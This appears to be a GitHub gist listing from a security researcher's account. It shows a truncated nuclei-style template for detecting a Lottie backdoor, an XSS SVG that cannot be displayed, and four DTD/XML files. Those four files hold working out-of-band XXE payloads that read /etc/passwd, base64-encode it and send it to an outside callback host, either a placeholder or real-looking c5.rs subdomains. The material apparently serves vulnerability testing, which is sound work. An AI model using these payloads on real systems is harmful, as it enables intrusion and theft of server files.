Gal Nagli NagliNagli
NagliNagli
/ lottie-backdoor.yaml
Created
October 31, 2024 00:13
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: backdoor-lottie-detection | |
| info: | |
| name: detect-lottie-backdoor | |
| author: nagli-wiz-research | |
| severity: critical | |
| requests: | |
| - raw: | |
| - |+ |
NagliNagli
/ xss2.svg
Created
January 29, 2025 10:56
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
NagliNagli
/ test.dtd
Created
February 6, 2025 23:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> | |
| <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://<COLLAB_URL>?%data;'>"> |
NagliNagli
/ test.dtd
Created
February 6, 2025 23:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> | |
| <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://5ouxuxkc.c5.rs?%data;'>"> |
NagliNagli
/ test.xml
Created
February 6, 2025 23:25
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> | |
| <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://5ouxuxkc.c5.rs?%data;'>"> |
NagliNagli
/ test9.dtd
Last active
February 9, 2025 15:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % d SYSTEM "php://filter/convert.base64-encode/resource=file:///etc/passwd"> | |
| <!ENTITY % c "<!ENTITY rrr SYSTEM 'http://zfp6590t.c5.rs/endpoint.php?a=%d;'>"> |